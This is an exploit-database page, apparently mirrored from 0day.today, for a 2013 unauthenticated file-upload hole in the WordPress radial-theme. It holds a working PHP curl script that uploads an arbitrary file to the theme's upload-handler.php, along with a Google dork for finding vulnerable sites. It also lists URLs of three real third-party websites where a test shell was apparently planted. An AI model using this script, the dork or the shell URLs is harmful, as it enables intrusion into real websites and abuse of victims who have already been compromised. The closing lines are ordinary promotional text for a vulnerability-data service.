Lucene search
K

WordPress radial-theme Themes Remote File Upload Vulnerability

🗓️ 13 Nov 2013 00:00:00Reported by iskorpitxType 
zdt
 zdt
🔗 0day.today👁 24 Views

WordPress radial-theme Themes Remote File Upload Vulnerability. Allows unauthorized users to upload files to the server, leading to potential malware injection

Code
###################################################################################################
# Exploit Title: WordPress radial-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 12/11/2013
# Vendor Homepage: http://www.orange-themes.com/
# Themes Link: http://www.orange-themes.com/portfolio/radial/
# Infected File: upload-handler.php
# Category: webapps
# Google dork: "/wp-content/themes/radial-theme/"
# Tested on : Windows/Linux
###################################################################################################

# Exploit


<?php 
$uploadfile="upload.php"; 
$ch = curl_init("http://127.0.0.1/wp-content/themes/radial-theme/functions/upload-handler.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile")); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$postResult = curl_exec($ch); 
curl_close($ch); 
print "$postResult"; 
?>

http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php


_________________________________

All http://www.mavi1.org members


---
test shell

http://www.lightningcomposites.com.au/wp-content/uploads/2013/11/ttt.php
http://www.bigdaddysclassics.com/wp-content/uploads/2013/11/ttt.php
http://michaelangelosautotrim.com/wp-content/uploads/2013/11/ttt.php

#  0day.today [2018-04-12]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation